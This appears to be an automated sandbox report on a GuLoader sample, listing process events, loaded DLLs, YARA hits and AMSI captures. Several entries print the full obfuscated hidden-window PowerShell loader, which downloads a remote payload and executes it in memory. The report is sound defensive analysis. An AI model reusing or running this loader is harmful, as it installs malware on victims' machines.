              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belejringstilstandenes.Unj && echo t"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Monostelous = 1;$Fomented='Sub';$Fomented+='strin';$Fomented+='g';Function Upstair91($Contrive){$Noontide=$Contrive.Length-$Monostelous;For($Bortskaffelsesmetode=5;$Bortskaffelsesmetode -lt $Noontide;$Bortskaffelsesmetode+=6){$Savnes+=$Contrive.$Fomented.Invoke( $Bortskaffelsesmetode, $Monostelous);}$Savnes;}function Skizoide($Cheanne){.($Scrimshorn) ($Cheanne);}$Lagenens=Upstair91 'automMSkvisoSamoazBi.eliNuclelMis ilSla,ea.vern/Vek.e5Unmag. Inf 0 Aaha Spade(UnrelW Im eiTatusnEk,pedTilkeoTrykkwIconos gumm vent.N VillTAtion Outse1 Efte0 Numm.,hoog0 Nabo;Skrot UkyndWcheiriP.ddenRokad6 Unde4Diara;Nanny Hus.exSelvg6Bikse4Konsu;Dagso Kor.fr Ego v Ripo:Helul1 lau2Overn1Perio. Hove0Genre) ,ugt ReplGRemnfeCor.ecPre,okNonvaoAfpas/Myste2Diaer0Lre r1Trich0Svanh0Pauci1condu0op.ak1,elss SemitF Oilsi,asserLu.thePriesf UoploLittex G.de/Snr l1 Caud2,hole1 .pre. Lobb0Savou ';$Unrevengingly166=Upstair91 'PeepiU Fl es,ndisePerv r Pins- Al,oAapprigSpadeeFil,nnGenavtNonfe ';$Stot=Upstair91 'ren rhBevistKedeltNiellpFortrsFotom:Selvh/ Acke/Bjergwfilbew.oncowBilla.Ov rss SisaeSamarnRefridE melsndvenpStimea Sangc Bukse Bes,.TempecCero,oPizzimMaste/BenaapKviltrstangofluff/AppoidProcelPrint/Va ut5Tet amCirku5OpspraReset1SolfauOp ys ';$Detonate=Upstair91 ',nthr>opbev ';$Scrimshorn=Upstair91 'Latkeis.igpe ballxKompr ';$Pelagia123='Tordnes';$Udpressede = Upstair91 'CirereTredic StaihSvrscoMetr. Filmm%Vildka A,phplill,pEstradR,misaPersptmanu.aInter%Bre,s\RestiBGenn,eEkseklVold eSoogejU,drarEdg,miFolkenSkorsgSt.nds PunctLope.iInduslbacitsHenhrtUnde.aKrgebn Bigfdfarvee .opon nomie KontsTyvep.SammeU Turbn Ta zjVeggi appli&R.dio&Udlov FikseDrypncUforuh CoinoAnde. Te,rt,fslu ';Skizoide (Upstair91 ' Ba d$Hon.rg Peril .outo GebrbSulfoa udsklSypho:kunneSRigsbk,interSynkats,emme M skr .ueleFlagegBiliniInform MoopeCinchnHovedtD trse SemitrneresLandi=Arbe,(Su,recReflemThinodTj.ne Medit/SpkhucTa.ul Amtsk$S adsUGrabbd HelspW,ener RenteDickysflorisS gareElderd EtlyeL,ane)maler ');Skizoide (Upstair91 'Ra,le$Sabelg ForslSloppo Ge sbKo.teaGrae,l Trac:spredBO.rejeTautnsIliadtRumvgrM risesam enStyrtdEftereCrowdsuropf=Vnget$Gr geSTvangtSm leoBan.stBlo.s.Poulis PhalpGrimrlD,visiDebittKamuf(Chest$L.cidDAdelseLydentMatteoCamern rackaSammetSiklie page) Redo ');$Stot=$Bestrendes[0];$songtress= (Upstair91 'Fri b$ StegglaanslLimitoStd ubInitiaGroenlAande: SkakS ,carpDundye MusocBi,tekVaretl FavoeCovendpayba= For,NSelvmeEnkepwLyrik-SekstO D,ukb.ommajTubuleExci.cOrigitBandl RouleSHj.teyRendes KlbetVaasee istimSecco.VirgiNoddf eforhit Jagg. oitfWTiltueShakeb RefrCProcelTerm,iJassieStrafnun.ott');$songtress+=$Skrteregimentets[1];Skizoide ($songtress);Skizoide (Upstair91 'Inca.$ stinSOvervpCarboephiltcA.sinkBo.bll.aveteKnackdEwder.PolisHHalvmeLe inaBije,dShik,e olyr Tagms Blg [Visc $ LudhUFhovenPy,pnrKole eRejsevZooloeephebnHomilgUd.kiiRe,hinme epgU.homlFodb,yBarog1Cepha6Wolfe6Ru,tp] Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belejringstilstandenes.Unj && echo t"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb? source: powershell.exe, 00000005.00000002.2184760858.000000000784A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdb source: powershell.exe, 00000005.00000002.2184760858.0000000007831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: m.Core.pdbSt source: powershell.exe, 00000005.00000002.2184760858.000000000784A000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Core.pdbk source: powershell.exe, 00000005.00000002.2184760858.0000000007831000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Yara detected GuLoader
              Source: Yara matchFile source: 00000005.00000002.2189165327.000000000A036000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.2900082947.0000000004FE6000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2188569981.0000000008BF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2181785367.0000000005EA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2611833386.000002046AEC5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Found suspicious powershell code related to unpacking or dynamic code loading
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Sippenippers)$global:Succesdatamaters = [System.Text.Encoding]::ASCII.GetString($Vibration)$global:Livsvigtiges=$Succesdatamaters.substring($Medicean,$Edifyingly)<#Sluseportes Unfore
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Autografsamleren $psychosynthesis $Inkommodere192), (Kasuel @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Shetlnderne = [AppDomain]::CurrentDomain.GetAss
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($ndre)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Unspinning, $false).DefineType($archdespot, $Oversky
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Sippenippers)$global:Succesdatamaters = [System.Text.Encoding]::ASCII.GetString($Vibration)$global:Livsvigtiges=$Succesdatamaters.substring($Medicean,$Edifyingly)<#Sluseportes Unfore
              Suspicious powershell command line found
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Monostelous = 1;$Fomented='Sub';$Fomented+='strin';$Fomented+='g';Function Upstair91($Contrive){$Noontide=$Contrive.Length-$Monostelous;For($Bortskaffelsesmetode=5;$Bortskaffelsesmetode -lt $Noontide;$Bortskaffelsesmetode+=6){$Savnes+=$Contrive.$Fomented.Invoke( $Bortskaffelsesmetode, $Monostelous);}$Savnes;}function Skizoide($Cheanne){.($Scrimshorn) ($Cheanne);}$Lagenens=Upstair91 'automMSkvisoSamoazBi.eliNuclelMis ilSla,ea.vern/Vek.e5Unmag. Inf 0 Aaha Spade(UnrelW Im eiTatusnEk,pedTilkeoTrykkwIconos gumm vent.N VillTAtion Outse1 Efte0 Numm.,hoog0 Nabo;Skrot UkyndWcheiriP.ddenRokad6 Unde4Diara;Nanny Hus.exSelvg6Bikse4Konsu;Dagso Kor.fr Ego v Ripo:Helul1 lau2Overn1Perio. Hove0Genre) ,ugt ReplGRemnfeCor.ecPre,okNonvaoAfpas/Myste2Diaer0Lre r1Trich0Svanh0Pauci1condu0op.ak1,elss SemitF Oilsi,asserLu.thePriesf UoploLittex G.de/Snr l1 Caud2,hole1 .pre. Lobb0Savou ';$Unrevengingly166=Upstair91 'PeepiU Fl es,ndisePerv r Pins- Al,oAapprigSpadeeFil,nnGenavtNonfe ';$Stot=Upstair91 'ren rhBevistKedeltNiellpFortrsFotom:Selvh/ Acke/Bjergwfilbew.oncowBilla.Ov rss SisaeSamarnRefridE melsndvenpStimea Sangc Bukse Bes,.TempecCero,oPizzimMaste/BenaapKviltrstangofluff/AppoidProcelPrint/Va ut5Tet amCirku5OpspraReset1SolfauOp ys ';$Detonate=Upstair91 ',nthr>opbev ';$Scrimshorn=Upstair91 'Latkeis.igpe ballxKompr ';$Pelagia123='Tordnes';$Udpressede = Upstair91 'CirereTredic StaihSvrscoMetr. Filmm%Vildka A,phplill,pEstradR,misaPersptmanu.aInter%Bre,s\RestiBGenn,eEkseklVold eSoogejU,drarEdg,miFolkenSkorsgSt.nds PunctLope.iInduslbacitsHenhrtUnde.aKrgebn Bigfdfarvee .opon nomie KontsTyvep.SammeU Turbn Ta zjVeggi appli&R.dio&Udlov FikseDrypncUforuh CoinoAnde. Te,rt,fslu ';Skizoide (Upstair91 ' Ba d$Hon.rg Peril .outo GebrbSulfoa udsklSypho:kunneSRigsbk,interSynkats,emme M skr .ueleFlagegBiliniInform MoopeCinchnHovedtD trse SemitrneresLandi=Arbe,(Su,recReflemThinodTj.ne Medit/SpkhucTa.ul Amtsk$S adsUGrabbd HelspW,ener RenteDickysflorisS gareElderd EtlyeL,ane)maler ');Skizoide (Upstair91 'Ra,le$Sabelg ForslSloppo Ge sbKo.teaGrae,l Trac:spredBO.rejeTautnsIliadtRumvgrM risesam enStyrtdEftereCrowdsuropf=Vnget$Gr geSTvangtSm leoBan.stBlo.s.Poulis PhalpGrimrlD,visiDebittKamuf(Chest$L.cidDAdelseLydentMatteoCamern rackaSammetSiklie page) Redo ');$Stot=$Bestrendes[0];$songtress= (Upstair91 'Fri b$ StegglaanslLimitoStd ubInitiaGroenlAande: SkakS ,carpDundye MusocBi,tekVaretl FavoeCovendpayba= For,NSelvmeEnkepwLyrik-SekstO D,ukb.ommajTubuleExci.cOrigitBandl RouleSHj.teyRendes KlbetVaasee istimSecco.VirgiNoddf eforhit Jagg. oitfWTiltueShakeb RefrCProcelTerm,iJassieStrafnun.ott');$songtress+=$Skrteregimentets[1];Skizoide ($songtress);Skizoide (Upstair91 'Inca.$ stinSOvervpCarboephiltcA.sinkBo.bll.aveteKnackdEwder.PolisHHalvmeLe inaBije,dShik,e olyr Tagms Blg [Visc $ LudhUFhovenPy,pnrKole eRejsevZooloeephebnHomilgUd.kiiRe,hinme epgU.homlFodb,yBarog1Cepha6Wolfe6Ru,tp] Pen,=Hom g$Vol,mLCl,quaV
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Monostelous = 1;$Fomented='Sub';$Fomented+='strin';$Fomented+='g';Function Upstair91($Contrive){$Noontide=$Contrive.Length-$Monostelous;For($Bortskaffelsesmetode=5;$Bortskaffelsesmetode -lt $Noontide;$Bortskaffelsesmetode+=6){$Savnes+=$Contrive.$Fomented.Invoke( $Bortskaffelsesmetode, $Monostelous);}$Savnes;}function Skizoide($Cheanne){.($Scrimshorn) ($Cheanne);}$Lagenens=Upstair91 'automMSkvisoSamoazBi.eliNuclelMis ilSla,ea.vern/Vek.e5Unmag. Inf 0 Aaha Spade(UnrelW Im eiTatusnEk,pedTilkeoTrykkwIconos gumm vent.N VillTAtion Outse1 Efte0 Numm.,hoog0 Nabo;Skrot UkyndWcheiriP.ddenRokad6 Unde4Diara;Nanny Hus.exSelvg6Bikse4Konsu;Dagso Kor.fr Ego v Ripo:Helul1 lau2Overn1Perio. Hove0Genre) ,ugt ReplGRemnfeCor.ecPre,okNonvaoAfpas/Myste2Diaer0Lre r1Trich0Svanh0Pauci1condu0op.ak1,elss SemitF Oilsi,asserLu.thePriesf UoploLittex G.de/Snr l1 Caud2,hole1 .pre. Lobb0Savou ';$Unrevengingly166=Upstair91 'PeepiU Fl es,ndisePerv r Pins- Al,oAapprigSpadeeFil,nnGenavtNonfe ';$Stot=Upstair91 'ren rhBevistKedeltNiellpFortrsFotom:Selvh/ Acke/Bjergwfilbew.oncowBilla.Ov rss SisaeSamarnRefridE melsndvenpStimea Sangc Bukse Bes,.TempecCero,oPizzimMaste/BenaapKviltrstangofluff/AppoidProcelPrint/Va ut5Tet amCirku5OpspraReset1SolfauOp ys ';$Detonate=Upstair91 ',nthr>opbev ';$Scrimshorn=Upstair91 'Latkeis.igpe ballxKompr ';$Pelagia123='Tordnes';$Udpressede = Upstair91 'CirereTredic StaihSvrscoMetr. Filmm%Vildka A,phplill,pEstradR,misaPersptmanu.aInter%Bre,s\RestiBGenn,eEkseklVold eSoogejU,drarEdg,miFolkenSkorsgSt.nds PunctLope.iInduslbacitsHenhrtUnde.aKrgebn Bigfdfarvee .opon nomie KontsTyvep.SammeU Turbn Ta zjVeggi appli&R.dio&Udlov FikseDrypncUforuh CoinoAnde. Te,rt,fslu ';Skizoide (Upstair91 ' Ba d$Hon.rg Peril .outo GebrbSulfoa udsklSypho:kunneSRigsbk,interSynkats,emme M skr .ueleFlagegBiliniInform MoopeCinchnHovedtD trse 